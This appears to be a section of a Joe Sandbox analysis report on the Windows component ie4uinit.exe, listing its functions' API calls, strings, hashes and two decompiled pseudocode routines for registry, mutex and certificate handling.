Uniqueness Score: -1.00%

Function 00007FF7319E0FD8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7319E0F30: CheckTokenMembership.ADVAPI32 ref: 00007FF7319E0F65
Part of subcall function 00007FF7319E0F30: LocalFree.KERNEL32 ref: 00007FF7319E0F9A

CreateFileMappingW.KERNEL32 ref: 00007FF7319E1021
LocalFree.KERNEL32 ref: 00007FF7319E102F
#791.IERTUTIL ref: 00007FF7319E103F
#791.IERTUTIL ref: 00007FF7319E104E
#134.IERTUTIL ref: 00007FF7319E1066
CloseHandle.KERNEL32 ref: 00007FF7319E1073

Strings

Local\windows_ie_global_counters, xrefs: 00007FF7319E0FFD
l, xrefs: 00007FF7319E1015

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: #791FreeLocal$#134CheckCloseCreateFileHandleMappingMembershipToken
String ID: Local\windows_ie_global_counters$l
API String ID: 3701204471-1037400814
Opcode ID: b623ef545a021c718cf8b48c73dde0d5627b76b704cae681b0da7cb9af6dd8d9
Instruction ID: ae9baa00083627b1bb95046acb6c3881e69daa02d4223c45369abb977ccc66d5
Opcode Fuzzy Hash: b623ef545a021c718cf8b48c73dde0d5627b76b704cae681b0da7cb9af6dd8d9
Instruction Fuzzy Hash: 9A118231F196C6A3EB106F51E844269B760BF48B69F848239CA1E07299CF7DD1459730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D37B8 Relevance: 13.7, APIs: 9, Instructions: 159
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00007FF77FF7319D37B8(void* __edx, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rbp, char _a8, char _a16, long long _a24, long long _a32) {
				intOrPtr _v56;
				long _t47;
				long _t50;
				intOrPtr _t56;
				intOrPtr _t62;
				void* _t73;
				intOrPtr _t108;
				char* _t132;
				intOrPtr* _t134;
				void* _t144;
				intOrPtr* _t146;

				_a24 = __rbx;
				_a32 = __rbp;
				 *((char*)(__rdx)) = 0;
				_t134 = __rdx;
				r13d = 1;
				if ( *((intOrPtr*)(__rcx + 8)) == 0) goto 0x319d3833;
				if ((WaitForSingleObject(??, ??) & 0xffffff7f) == 0) goto 0x319d3833;
				_t47 = GetLastError();
				_t48 =  ==  ? r13d : _t47;
				_t83 =  ==  ? r13d : _t47;
				if (( ==  ? r13d : _t47) > 0) goto 0x319d3816;
				_t73 =  ==  ? r13d : GetLastError();
				goto 0x319d382b;
				_t50 = GetLastError();
				_t51 =  ==  ? r13d : _t50;
				_t74 = ( ==  ? r13d : _t50) & 0x0000ffff;
				_t75 = ( ==  ? r13d : _t50) & 0x0000ffff | 0x80070000;
				_t86 = ( ==  ? r13d : _t50) & 0x0000ffff | 0x80070000;
				if ((( ==  ? r13d : _t50) & 0x0000ffff | 0x80070000) < 0) goto 0x319d39c6;
				r14d = 0;
				_t108 =  *((intOrPtr*)(__rcx + 0x10));
				if (_t108 == 0) goto 0x319d3845;
				goto 0x319d3847;
				if (0 >= 0) goto 0x319d3893;
				_t146 =  *((intOrPtr*)(_t144 +  *((intOrPtr*)(_t108 + 8))));
				if (E00007FF77FF7319D8D00(__rcx, _t146, __rdx) < 0) goto 0x319d388a;
				if ( *((intOrPtr*)(_t146 + 0x7a0)) != 2) goto 0x319d388a;
				__imp__#76();
				 *0x319e7038();
				goto 0x319d3838;
				if ( *((intOrPtr*)(__rcx + 0x60)) == 0) goto 0x319d38a4;
				E00007FF77FF7319D9204( *((intOrPtr*)( *_t146 + 0x10)), __rcx,  *((intOrPtr*)(__rcx + 0x60)), __rdx);
				if ( *(__rcx + 0x50) != r13d) goto 0x319d38f7;
				if ( *((long long*)(__rcx + 0x48)) == 0) goto 0x319d38f7;
				_t132 =  &_a8;
				if (E00007FF77FF7319D49C0( *((long long*)(__rcx + 0x48)), _t132) < 0) goto 0x319d38f7;
				_t56 =  *((intOrPtr*)(__rcx + 0x40));
				_v56 = _t56;
				_t20 = _t132 + 3; // 0x5
				r8d = _t20;
				__imp__#654();
				if (_t56 < 0) goto 0x319d38eb;
				 *(__rcx + 0x50) =  *(__rcx + 0x50) & 0x00000000;
				 *__rdx = r13b;
				goto 0x319d38f7;
				E00007FF77FF7319D210C(__rcx, 0x319ec0e4);
				if ( *(__rcx + 0x30) != r13d) goto 0x319d391d;
				if ( *((intOrPtr*)(__rcx + 0x28)) == 0) goto 0x319d391d;
				if (E00007FF77FF7319C68FC( *((intOrPtr*)( *_t146 + 0x10)),  *((intOrPtr*)(__rcx + 0x28))) < 0) goto 0x319d391d;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) & 0x00000000;
				 *_t134 = r13b;
				if ( *(__rcx + 0x20) != r13d) goto 0x319d3951;
				if ( *((intOrPtr*)(__rcx + 0x18)) == 0) goto 0x319d3951;
				if (E00007FF77FF7319C68FC( *((intOrPtr*)( *_t146 + 0x10)),  *((intOrPtr*)(__rcx + 0x18))) < 0) goto 0x319d3945;
				 *(__rcx + 0x20) =  *(__rcx + 0x20) & 0x00000000;
				 *_t134 = r13b;
				goto 0x319d3951;
				E00007FF77FF7319D210C(__rcx, 0x319ec0e0);
				if ( *(__rcx + 0x58) != r13d) goto 0x319d3997;
				if (E00007FF77FF7319D49FC( *(__rcx + 0x58) - r13d,  &_a16) < 0) goto 0x319d3997;
				_t62 =  *((intOrPtr*)(__rcx + 0x54));
				r8d = r13d;
				_a8 = _t62;
				_v56 = 4;
				__imp__#654();
				if (_t62 < 0) goto 0x319d3997;
				 *(__rcx + 0x58) =  *(__rcx + 0x58) & 0x00000000;
				 *_t134 = r13b;
				if ( *(__rcx + 0x38) != r13d) goto 0x319d39b5;
				__imp__#675();
				if (_t62 < 0) goto 0x319d39b5;
				 *(__rcx + 0x38) =  *(__rcx + 0x38) & 0x00000000;
				 *_t134 = r13b;
				if ( *((intOrPtr*)(__rcx + 8)) == 0) goto 0x319d39c6;
				ReleaseMutex(??);
				return 0;
			}

0x7ff7319d37b8
0x7ff7319d37bd
0x7ff7319d37d1
0x7ff7319d37d8
0x7ff7319d37db
0x7ff7319d37e4
0x7ff7319d37f4
0x7ff7319d37f6
0x7ff7319d37fe
0x7ff7319d3802
0x7ff7319d3804
0x7ff7319d3810
0x7ff7319d3814
0x7ff7319d3816
0x7ff7319d381e
0x7ff7319d3822
0x7ff7319d3825
0x7ff7319d382b
0x7ff7319d382d
0x7ff7319d3835
0x7ff7319d3838
0x7ff7319d383f
0x7ff7319d3843
0x7ff7319d3849
0x7ff7319d3852
0x7ff7319d3867
0x7ff7319d386c
0x7ff7319d3874
0x7ff7319d3884
0x7ff7319d3891
0x7ff7319d389a
0x7ff7319d389f
0x7ff7319d38a8
0x7ff7319d38af
0x7ff7319d38b1
0x7ff7319d38bd
0x7ff7319d38bf
0x7ff7319d38d0
0x7ff7319d38d4
0x7ff7319d38d4
0x7ff7319d38d8
0x7ff7319d38e0
0x7ff7319d38e2
0x7ff7319d38e6
0x7ff7319d38e9
0x7ff7319d38f2
0x7ff7319d38fb
0x7ff7319d3904
0x7ff7319d3914
0x7ff7319d3916
0x7ff7319d391a
0x7ff7319d3921
0x7ff7319d392a
0x7ff7319d393a
0x7ff7319d393c
0x7ff7319d3940
0x7ff7319d3943
0x7ff7319d394c
0x7ff7319d3955
0x7ff7319d3963
0x7ff7319d3965
0x7ff7319d3972
0x7ff7319d397a
0x7ff7319d397e
0x7ff7319d3986
0x7ff7319d398e
0x7ff7319d3990
0x7ff7319d3994
0x7ff7319d399b
0x7ff7319d39a4
0x7ff7319d39ac
0x7ff7319d39ae
0x7ff7319d39b2
0x7ff7319d39be
0x7ff7319d39c0
0x7ff7319d39de

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF7319D37E9
GetLastError.KERNEL32 ref: 00007FF7319D37F6
GetLastError.KERNEL32 ref: 00007FF7319D3806
GetLastError.KERNEL32 ref: 00007FF7319D3816
#76.IERTUTIL ref: 00007FF7319D3874
#654.IERTUTIL ref: 00007FF7319D38D8
#654.IERTUTIL ref: 00007FF7319D3986
#675.IERTUTIL ref: 00007FF7319D39A4
ReleaseMutex.KERNEL32 ref: 00007FF7319D39C0

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$#654$#675MutexObjectReleaseSingleWait
String ID:
API String ID: 2927321091-0
Opcode ID: 0570598328cd0a3445d052660d7ee6fe1f1a9984898ff71ac80689e50312ae1d
Instruction ID: 28e893c6b268ab9708109d31d308b58bb6adc14d7ea68d9d46cb3b4588ed97bf
Opcode Fuzzy Hash: 0570598328cd0a3445d052660d7ee6fe1f1a9984898ff71ac80689e50312ae1d
Instruction Fuzzy Hash: A4618F77E0C682A6FB10AF25D84823AA760BF88B5DF844035CA4D43299CFBDE544E731

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CE6DC Relevance: 13.6, APIs: 9, Instructions: 147COMMON

Download Yara Rule

APIs

StrCmpICW.SHLWAPI ref: 00007FF7319CE703
StrCmpICW.SHLWAPI ref: 00007FF7319CE71A
StrCmpICW.SHLWAPI ref: 00007FF7319CE731
StrCmpICW.SHLWAPI ref: 00007FF7319CE748
StrCmpICW.SHLWAPI ref: 00007FF7319CE75F
StrCmpICW.SHLWAPI ref: 00007FF7319CE772
StrCmpICW.SHLWAPI ref: 00007FF7319CE785
StrCmpICW.SHLWAPI ref: 00007FF7319CE798
SysFreeString.OLEAUT32 ref: 00007FF7319CE86C

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 7b290ba838e9cbb41a975afbe13c9ea87afda25f0d971c499159bed4490d70b4
Instruction ID: 29a4e4a41c071f1331fe0b979d3285de404d9f89c992bb16242ae7a057dcb86d
Opcode Fuzzy Hash: 7b290ba838e9cbb41a975afbe13c9ea87afda25f0d971c499159bed4490d70b4
Instruction Fuzzy Hash: B2611C65E08A96A9EB14EF26C980379AB60EB44FCDF804031DD8E477A9DFACD444D770

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CA040 Relevance: 13.6, APIs: 9, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

#57.IERTUTIL(00007FF7319CA530), ref: 00007FF7319CA068
GetLengthSid.ADVAPI32 ref: 00007FF7319CA07B
LocalAlloc.KERNEL32 ref: 00007FF7319CA0B0
memset.MSVCRT ref: 00007FF7319CA0C6
memcpy_s.MSVCRT ref: 00007FF7319CA0D8
AddAccessAllowedAceEx.ADVAPI32 ref: 00007FF7319CA0FC
GetLastError.KERNEL32 ref: 00007FF7319CA10D
LocalFree.KERNEL32 ref: 00007FF7319CA124
LocalFree.KERNEL32 ref: 00007FF7319CA13D

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Local$Free$AccessAllocAllowedErrorLastLengthmemcpy_smemset
String ID:
API String ID: 916274048-0
Opcode ID: 86ce98882c31649041cf60e8fa346dc71d9fcae545289237fbed76604f7cf3fa
Instruction ID: 76e4f8f0a40446e0cc33ae63e2cb707b85f709c246dd823327b9c013b06270e4
Opcode Fuzzy Hash: 86ce98882c31649041cf60e8fa346dc71d9fcae545289237fbed76604f7cf3fa
Instruction Fuzzy Hash: 29319231F0C79292D714AF26A944139B3A1BB84FD4F948134CE8987758EEBCD441D764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D72E8 Relevance: 13.6, APIs: 9, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 00007FF7319D7302
MultiByteToWideChar.KERNEL32 ref: 00007FF7319D731F
SysAllocStringLen.OLEAUT32 ref: 00007FF7319D732C
MultiByteToWideChar.KERNEL32 ref: 00007FF7319D734F
SysFreeString.OLEAUT32 ref: 00007FF7319D735C
SysStringLen.OLEAUT32 ref: 00007FF7319D736C
VarBstrCat.OLEAUT32 ref: 00007FF7319D7386
SysFreeString.OLEAUT32 ref: 00007FF7319D7395
SysFreeString.OLEAUT32 ref: 00007FF7319D73A8

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr
String ID:
API String ID: 1801994256-0
Opcode ID: d3145d69244c4f85f159bb4c11e411ed65052b5f760adfb04ab078cf95d46dc5
Instruction ID: 3bf6b8658e3a646f97aa77fc6a560439d1766bb228a785342ce3aa0327ccd731
Opcode Fuzzy Hash: d3145d69244c4f85f159bb4c11e411ed65052b5f760adfb04ab078cf95d46dc5
Instruction Fuzzy Hash: 83217532E0CB8191E718AF66F84416DF7A1BB84BA8F448139DE8D47B58DFBCD4459720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CE9CC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 00007FF7319CEAB2
SysFreeString.OLEAUT32 ref: 00007FF7319CEAFC
SysFreeString.OLEAUT32 ref: 00007FF7319CEB1D
SysFreeString.OLEAUT32 ref: 00007FF7319CEB44
SysStringLen.OLEAUT32 ref: 00007FF7319CEB6A
SysFreeString.OLEAUT32 ref: 00007FF7319CEC4C

Strings

/%s/, xrefs: 00007FF7319CEADB

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$Free
String ID: /%s/
API String ID: 1391021980-1213264659
Opcode ID: 72edbbe58e1da21402a24343c84eb4073f674baba544b0a95578b6a67ba4fd95
Instruction ID: b6f656d0e123e982c605237b6c5012739cf711f715d5c1c77475ed4b8aff2cee
Opcode Fuzzy Hash: 72edbbe58e1da21402a24343c84eb4073f674baba544b0a95578b6a67ba4fd95
Instruction Fuzzy Hash: A8718632F1CAC2A5EB50AB15D440179AB60FB84788F904031EACF57A5DDF7CE554EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DB9DC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00007FF77FF7319DB9DC(void* __rdx, signed long long* __r9) {
				signed int _v56;
				void* _v584;
				signed short _v1112;
				char _v1176;
				void* _v1184;
				long long _v1192;
				void* __rbx;
				signed int _t24;
				int _t25;
				long _t32;
				long _t35;
				void* _t44;
				signed long long _t68;
				void* _t70;
				signed long long _t71;
				void* _t74;
				int _t76;
				signed long long* _t85;
				signed long long _t87;
				signed long long _t88;
				void* _t95;

				_t88 =  &_v1184;
				_t68 =  *0x319f4658; // 0x8be7dd1f02a
				_v56 = _t68 ^ _t88;
				_t85 = __r9;
				 *__r9 = _t87;
				r14d = 0x104;
				r9d = 0;
				_t24 = GetFullPathNameW(??, ??, ??, ??);
				if (_t24 == 0) goto 0x319dbb14;
				if (_t24 - r14d >= 0) goto 0x319dbb0d;
				_v1184 = r14d;
				_v1192 =  &_v1112;
				r9d = _t24;
				_t25 = LCMapStringW(??, ??, ??, ??, ??, ??);
				if (_t25 <= 0) goto 0x319dbb14;
				_t76 = _t25;
				if (_t76 - _t95 >= 0) goto 0x319dbb0d;
				_t70 = _t76 + _t76;
				if (_t70 - 0x208 >= 0) goto 0x319dbb73;
				 *((short*)(_t88 + _t70 + 0x70)) = 0;
				r9d = 0x3e5;
				goto 0x319dbaa8;
				r9d = r9d * 0x1f;
				r9d = r9d + (_v1112 & 0xffff);
				if ((( &_v1112)[1] & 0x0000ffff) != 0) goto 0x319dba97;
				if (_t76 <= 0) goto 0x319dbad4;
				_t71 = _t87;
				if ( *((short*)(_t88 + 0x70 + _t71 * 2)) != 0x5c) goto 0x319dbacc;
				 *((short*)(_t88 + 0x70 + _t71 * 2)) = 0x3a;
				if (_t71 + _t74 - _t76 < 0) goto 0x319dbaba;
				if (E00007FF77FF7319C1394(( &_v1112)[1] & 0x0000ffff,  &_v1176,  &(( &_v1112)[1]), L"%X_", __r9) < 0) goto 0x319dbb55;
				_v1192 =  &_v1112;
				E00007FF77FF7319DDA28(_t74, __rdx, _t95, _t85,  &_v1176);
				goto 0x319dbb55;
				goto 0x319dbb55;
				_t32 = GetLastError();
				_t33 =  ==  ? 1 : _t32;
				_t63 =  ==  ? 1 : _t32;
				if (( ==  ? 1 : _t32) > 0) goto 0x319dbb37;
				_t44 =  ==  ? 1 : GetLastError();
				goto 0x319dbb4b;
				_t35 = GetLastError();
				_t36 =  ==  ? 1 : _t35;
				_t45 = ( ==  ? 1 : _t35) & 0x0000ffff;
				_t46 = ( ==  ? 1 : _t35) & 0x0000ffff | 0x80070000;
				_t38 =  !=  ? ( ==  ? 1 : _t35) & 0x0000ffff | 0x80070000 : 0x80070570;
				return E00007FF77FF7319E38D0( !=  ? ( ==  ? 1 : _t35) & 0x0000ffff | 0x80070000 : 0x80070570, ( ==  ? 1 : _t35) & 0x0000ffff | 0x80070000, _v56 ^ _t88);
			}

0x7ff7319db9e3
0x7ff7319db9ea
0x7ff7319db9f4
0x7ff7319db9fc
0x7ff7319dba0c
0x7ff7319dba0f
0x7ff7319dba15
0x7ff7319dba1b
0x7ff7319dba23
0x7ff7319dba2c
0x7ff7319dba37
0x7ff7319dba3c
0x7ff7319dba4e
0x7ff7319dba56
0x7ff7319dba5e
0x7ff7319dba64
0x7ff7319dba6a
0x7ff7319dba70
0x7ff7319dba7a
0x7ff7319dba80
0x7ff7319dba8f
0x7ff7319dba95
0x7ff7319dba9e
0x7ff7319dbaa2
0x7ff7319dbaab
0x7ff7319dbab0
0x7ff7319dbab2
0x7ff7319dbac0
0x7ff7319dbac7
0x7ff7319dbad2
0x7ff7319dbaec
0x7ff7319dbafb
0x7ff7319dbb06
0x7ff7319dbb0b
0x7ff7319dbb12
0x7ff7319dbb14
0x7ff7319dbb21
0x7ff7319dbb24
0x7ff7319dbb26
0x7ff7319dbb32
0x7ff7319dbb35
0x7ff7319dbb37
0x7ff7319dbb3f
0x7ff7319dbb42
0x7ff7319dbb45
0x7ff7319dbb52
0x7ff7319dbb72

APIs

GetFullPathNameW.KERNEL32 ref: 00007FF7319DBA1B
LCMapStringW.KERNEL32 ref: 00007FF7319DBA56
GetLastError.KERNEL32 ref: 00007FF7319DBB14
GetLastError.KERNEL32 ref: 00007FF7319DBB28
GetLastError.KERNEL32 ref: 00007FF7319DBB37

Strings

\, xrefs: 00007FF7319DBABA
%X_, xrefs: 00007FF7319DBAD4

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$FullNamePathString
String ID: %X_$\
API String ID: 1618852869-896525776
Opcode ID: 74d6827304ed034feffc8a136a1df8067581cfb9b97dfd9d7dcd6606c0e958a1
Instruction ID: 8760075e7aa2c50459bb4c90f39746f065c63554b3f5e18bc01956be04d7fd81
Opcode Fuzzy Hash: 74d6827304ed034feffc8a136a1df8067581cfb9b97dfd9d7dcd6606c0e958a1
Instruction Fuzzy Hash: E541E912F0C7C1A6FB20AB15E458776A3D0EF85748FC04135DA4E8769CDEBCE441A725

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D780C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 110encryptionCOMMON

Download Yara Rule

APIs

CertGetIntendedKeyUsage.CRYPT32 ref: 00007FF7319D7842
CertGetEnhancedKeyUsage.CRYPT32 ref: 00007FF7319D7871

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

CertGetEnhancedKeyUsage.CRYPT32 ref: 00007FF7319D7899
StrCmpNA.SHLWAPI ref: 00007FF7319D78D1
StrCmpNW.SHLWAPI(?,?,00000000,00000000,?,00007FF7319D7A0D), ref: 00007FF7319D793D

Strings

IE Enhanced User Preference Protection, xrefs: 00007FF7319D7933
1.3.6.1.4.1.311.13.1, xrefs: 00007FF7319D78CA

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CertUsage$Enhanced$HeapIntendedProcess
String ID: 1.3.6.1.4.1.311.13.1$IE Enhanced User Preference Protection
API String ID: 3357760039-1085473373
Opcode ID: f2ee5f483f1c7b7f23e33116ad6f2625a3009ae2ad16315e6239151e5e042d0c
Instruction ID: aafb9eb9ef9e205f6d3291b1660999d5717eeb187a5925e4e5a0aef8520ed401
Opcode Fuzzy Hash: f2ee5f483f1c7b7f23e33116ad6f2625a3009ae2ad16315e6239151e5e042d0c
Instruction Fuzzy Hash: DE41D323F0C786A2EB18AB26D985039E790AB45B9CF848134CE5D0379CDF7CE851E720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C3738 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 00007FF7319C378E
RegOpenKeyExW.ADVAPI32 ref: 00007FF7319C37A6
StrCmpIW.SHLWAPI ref: 00007FF7319C3812
RegSetValueW.ADVAPI32 ref: 00007FF7319C3835
RegCloseKey.ADVAPI32 ref: 00007FF7319C3840

Strings

IEXPLORE.EXE, xrefs: 00007FF7319C37EF, 00007FF7319C380B
Software\Clients\StartMenuInternet, xrefs: 00007FF7319C3756

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CloseCreateOpenValue
String ID: IEXPLORE.EXE$Software\Clients\StartMenuInternet
API String ID: 776291540-1175255948
Opcode ID: 4d36491de34716d6121cd43e8542a88f00773e016fac8a8a7f43ff24cd0bac07
Instruction ID: 4fb9c94e3d75252a77860288f63a79f7c41fa027b4cf588c8d26a2a8b7738efb
Opcode Fuzzy Hash: 4d36491de34716d6121cd43e8542a88f00773e016fac8a8a7f43ff24cd0bac07
Instruction Fuzzy Hash: AA314272E1CBC2A6EB60AB50E484766F3A4FB8875CF804135D5CD02A58DFBCD249DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E0E48 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E0E86
RegQueryValueExW.ADVAPI32 ref: 00007FF7319E0EC1
RegQueryValueExW.ADVAPI32 ref: 00007FF7319E0EFA
RegCloseKey.ADVAPI32 ref: 00007FF7319E0F12

Strings

SYSTEM\Setup, xrefs: 00007FF7319E0E75
SystemSetupInProgress, xrefs: 00007FF7319E0EA1
OOBEInProgress, xrefs: 00007FF7319E0EDD

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: OOBEInProgress$SYSTEM\Setup$SystemSetupInProgress
API String ID: 1586453840-252206877
